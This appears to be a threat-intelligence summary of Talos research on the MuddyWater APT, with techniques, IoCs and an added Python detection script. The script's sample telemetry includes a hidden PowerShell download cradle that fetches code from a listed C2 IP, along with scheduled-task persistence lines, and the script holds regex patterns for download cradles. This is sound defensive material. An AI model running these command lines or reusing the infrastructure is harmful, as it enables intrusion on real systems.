Talos links MuddyWater to Iranian interests and describes a conglomerate of sub-groups conducting global campaigns using maldocs, PowerShell/VB/JavaScript tooling, and Windows RATs such as SloughRAT to achieve espionage, IP theft, and potentially ransomware and destructive operations. The campaigns span Turkey, the Arabian Peninsula, Armenia, Pakistan, Jordan, and other regions, showing shared techniques across subgroups and evolving attack methods.
#MuddyWater #SloughRAT #Canopy #Ligolo #MERCURY #StaticKitten #MOIS #Iran #Turkey #ArabianPeninsula
Keypoints
- MuddyWater is an Iranian-linked APT umbrella likely comprised of multiple sub-teams that operate independently but share techniques and tooling.
- Campaigns commonly use maldocs to deploy PowerShell-, VB-, and JavaScript-based downloaders and RATs across Turkey, Asia, and the Middle East.
- The SloughRAT WSF-based RAT is used in campaigns against the Arabian Peninsula (and Jordan), with obfuscated code that executes arbitrary commands from C2 servers.
- Two additional script-based implants (VB and JavaScript) from 2019–2022 download and run commands on victims’ systems, expanding MuddyWater’s toolset.
- MuddyWater relies on DNS for C2 contact and HTTP for initial host communication, frequently using living-off-the-land binaries and remote tools to establish footholds.
- There is strong evidence of TTP sharing and gradual evolution of techniques across geographies, supporting the “group of groups” model rather than a single actor.
- Targets include governments, universities, and private entities (e.g., telecom providers), with objectives spanning espionage, IP theft, and potentially ransomware/destructive operations.
MITRE Techniques
- [T1059.001] PowerShell – Use of PowerShell to execute downloads and payloads. Quote: ‘PowerShell-based downloader malware.’
- [T1059.005] Visual Basic – VB-based implant (late 2021 – 2022) that downloads and runs arbitrary commands. Quote: ‘Visual Basic (VB) … downloads and runs arbitrary commands on the victim’s system.’
- [T1059.007] JavaScript – JavaScript-based implants (2019 – 2020) that download and run arbitrary commands. Quote: ‘one in JavaScript (2019 – 2020), which also downloads and runs arbitrary commands on the victim’s system.’
- [T1566.001] Phishing – Malicious documents (maldocs) used to deploy downloaders and RATs. Quote: ‘malicious documents (maldocs) to deploy downloaders and RATs’
- [T1021.001] Remote Services – Use of ConnectWise remote administration tool to gain initial foothold. Quote: ‘Connectwise Remote Administration tool’ (contextual mention of rapid access to targets).
- [T1047] Windows Management Instrumentation (WMI) – RAT begins by performing a WMI query to record the IP address of the infected endpoint. Quote: ‘The RAT script begins execution by performing a WMI query to record the IP address of the infected endpoint.’
- [T1071.001] Web Protocols – Initial contact with hosting servers is done via HTTP. Quote: ‘initial contact with hosting servers is done via HTTP.’
- [T1071.004] Application Layer Protocol: DNS – DNS used to contact C2 servers. Quote: ‘MuddyWater frequently relies on DNS to contact their C2 servers.’
- [T1547.001] Boot or Logon Autostart: Startup Folder – Persistence via the current user’s Startup folder. Quote: ‘Startup folder by the VBA macro to establish persistence across reboots.’
- [T1053.005] Scheduled Task – Malicious VB/VBScript-based downloaders leverage scheduled tasks. Quote: ‘malicious scheduled tasks’
- [T1027] Obfuscated Files or Information – The WSF RAT and related components use multilayer obfuscation. Quote: ‘The WSF implant has several capabilities. The script uses multilayer obfuscation to hide its true extensions.’
- [T1572] Protocol Tunneling – Use of Ligolo reverse-tunneling tool to gain control over endpoints. Quote: ‘The attackers utilized SloughRAT to deploy Ligolo, an open-source reverse-tunneling tool to gain a greater degree of control over the infected endpoints.’
- [T1041] Exfiltration Over C2 Channel – Data exfiltrated to and from the C2 via HTTP. Quote: ‘Any data sent to the C2 server is in the format of HTTP forms…’
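The technique list above maps naturally onto endpoint hunting rules. The following is an added example (not Talos' code or tooling) that encodes the listed behaviours as detection logic and runs it over a handful of constructed EDR-style process and network events; the event dictionary layout, field names and sample command lines are assumptions made for the example, while the IP and domain indicators are the ones listed on this page.

```python
import re
from typing import Dict, List

# Infrastructure indicators taken from this summary's IoC section.
C2_IPS = {"185.118.164.195", "5.199.133.149", "88.119.170.124",
          "178.32.30.3", "95.181.161.81", "185.183.97.25"}
C2_DOMAINS = {"lalindustries.com", "advanceorthocenter.com"}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Per-user Startup folder, matched case-insensitively anywhere in a command line.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
# Common PowerShell download-cradle primitives.
PS_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)

# Rule IDs reuse the MITRE technique numbers from the list above.
RULES = {
    "T1566.001": "Office application spawned a script host or PowerShell (maldoc)",
    "T1547.001": ".wsf script executed from the user's Startup folder",
    "T1047":     "script host launched wmic.exe (WMI host fingerprinting)",
    "T1053.005": "script host created a scheduled task",
    "T1059.001": "PowerShell download cradle",
    "T1071.001": "HTTP POST to known MuddyWater infrastructure",
    "IOC":       "connection to an IP or domain from the indicator list",
}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt(event: Dict) -> List[str]:
    """Return the rule IDs a single event trips (empty list if none)."""
    hits: List[str] = []
    if event["type"] == "process":
        image = _basename(event["image"])
        parent = _basename(event.get("parent_image", ""))
        cmd = event.get("cmdline", "")
        if parent in OFFICE_APPS and (image in SCRIPT_HOSTS or image == "powershell.exe"):
            hits.append("T1566.001")
        if image in SCRIPT_HOSTS and STARTUP_DIR.search(cmd) and ".wsf" in cmd.lower():
            hits.append("T1547.001")
        if image == "wmic.exe" and parent in SCRIPT_HOSTS:
            hits.append("T1047")
        if image == "schtasks.exe" and parent in SCRIPT_HOSTS and "/create" in cmd.lower():
            hits.append("T1053.005")
        if image == "powershell.exe" and PS_CRADLE.search(cmd):
            hits.append("T1059.001")
    elif event["type"] == "network":
        dst_ip = event.get("dst_ip", "")
        dst_host = event.get("dst_host", "").lower()
        if dst_ip in C2_IPS or dst_host in C2_DOMAINS:
            hits.append("IOC")
            # SloughRAT sends data to its C2 as HTTP forms, i.e. POST bodies.
            if event.get("proto") == "http" and event.get("method") == "POST":
                hits.append("T1071.001")
    return hits


def hunt_all(events: List[Dict]) -> Dict[int, List[str]]:
    """Map event index -> tripped rule IDs, for events that tripped at least one."""
    return {i: h for i, e in enumerate(events) if (h := hunt(e))}


# Constructed sample telemetry (hypothetical host/user names, not real captures).
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\AppData\Local\Temp\invoice.wsf"'},
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B "C:\Users\victim\AppData\Roaming\Microsoft\Windows'
                r'\Start Menu\Programs\Startup\update.wsf"'},
    {"type": "process", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": "wmic nicconfig get ipaddress"},
    {"type": "process", "parent_image": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 10 /tn Updater /tr "wscript C:\Users\victim\u.vbs"'},
    {"type": "process", "parent_image": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('hxxp://185.118.164.195/c')"},
    {"type": "network", "dst_ip": "185.118.164.195", "dst_port": 80,
     "proto": "http", "method": "POST", "uri": "/c"},
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"type": "network", "dst_host": "www.example.com", "dst_port": 443,
     "proto": "https", "method": "GET", "uri": "/"},
]

if __name__ == "__main__":
    for idx, ids in hunt_all(SAMPLE_EVENTS).items():
        print(idx, [f"{i}: {RULES[i]}" for i in ids])
```

The process rules key on parent/child relationships and command-line content rather than file hashes, so they survive the re-obfuscation of the script implants that the summary describes, while the network rule is a plain indicator match that should be refreshed as the infrastructure list changes.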
Indicators of Compromise
- [IP] C2 or hosting endpoints: 185.118.164.195, 5.199.133.149, 88.119.170.124, 178.32.30.3, 95.181.161.81, 185.183.97.25
- [Domain] Domains involved in infrastructure or payload delivery: lalindustries.com, advanceorthocenter.com
- [URL] C2/delivery URLs – examples: hxxp://185.118.164.195/c, hxxp://lalindustries.com/wp-content/upgrade/editor.php, hxxp://advanceorthocenter.com/wp-includes/editor.php, hxxp://95.181.161.81/mm57aayn230
- [URL] Additional distribution/collection endpoints: hxxp://5.199.133.149/oeajgyxyxclqmfqayv, hxxp://178.32.30.3:80/kz10n2f9d5c4pkz10n2f9s2vhkz10n2f9/gcvvPu2KXdqEbDpJQ33/
- [File Hash] Maldocs – 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c, 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
- [File Hash] Maldocs – 7de663524b63b865e57ffc3eb4a339e150258583fdee6c2c2ca4dd7b5ed9dfe7, 6e50e65114131d6529e8a799ff660be0fc5e88ec882a116f5a60a2279883e9c4
- [File Hash] WSF components – d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0, ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
- [File Hash] VB-based downloader – fb69c821f14cb0d89d3df9eef2af2d87625f333535eb1552b0fcd1caba38281f
- [File Hash] JS-based downloader – 202bf7a4317326b8d0b39f1fa19304c487128c8bd6e52893a6f06f9640e138e6, 3fe9f94c09ee450ab24470a7bcd3d6194d8a375b3383f768662c1d561dab878d
- [File Hash] JS-based downloader – cf9b1e0d17199f783ed2b863b0289e8f209600a37724a386b4482c2001146784
- [File Hash] EXE payloads – a500e5ab8ce265d1dc8af1c00ea54a75b57ede933f64cea794f87ef1daf287a1
- [URL] Additional IOCs – 185.118.164.195/c, 5.199.133.149/oeajgyxyxclqmfqayv, 88.119.170.124/lcekcnkxkbllmwlpoklgof
Read more: https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html